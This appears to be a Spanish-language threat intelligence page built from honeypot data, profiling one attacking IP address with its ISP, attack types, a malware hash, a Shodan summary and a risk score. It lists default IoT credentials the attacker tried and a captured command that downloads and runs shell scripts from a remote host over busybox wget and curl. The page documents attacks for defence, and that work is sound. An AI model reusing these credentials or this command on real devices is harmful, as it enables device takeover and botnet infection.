TROYANOSYVIRUS
Amenaza ActivaALTO

142.248.80.38

Primera Deteccion4/4/2026
Ultima Actividad23/4/2026
ISPAdvin Services LLC
🎯
98
Ataques Totales
🔌
5
Puertos
📡
5
Tipos Ataque
🦠
1
Malware

Geolocalizacion

Pais
🇺🇸 Estados Unidos
Ciudad
Desconocida
ASN
AS22295
ISP
Advin Services LLC

Tipos de Ataque

ssh_telnet_honeypot
yaml_exploit_honeypot
adb_honeypot
web_honeypot
tcp_trap

Puertos Atacados

23804001555560001

Malware Asociado

e3b0c44298fc1c149afb...

Credenciales Intentadas

🔐root/root
1x
🔐root/vizxv
1x
🔐superadmin/admin123
1x
🔐admin/hwadmin
1x
🔐support/support
1x
🔐tech/tech
1x
🔐telecomadmin/admintelecom
1x
🔐admin/1234
1x
🔐admin/12345
1x
🔐user/user
1x
🔐root/xmhdpc
1x
🔐admin/admin
1x
🔐admin/password
1x
🔐root/password
1x
🔐root/admin123
1x

Comandos Ejecutados

$cd /data/local/tmp/; busybox wget http://142.248.80.144/w.sh; sh w.sh; curl http://142.248.80.144/c.sh; sh c.sh1x

Exposicion segun Shodan InternetDBShodan

Datos de InternetDB, actualizacion no en tiempo real

Puertos
22
CPEs
cpe:/a:openbsd:openssh:for_Windows_9.5

Evaluacion de Riesgo

65
/100
BajoMedioAltoCritico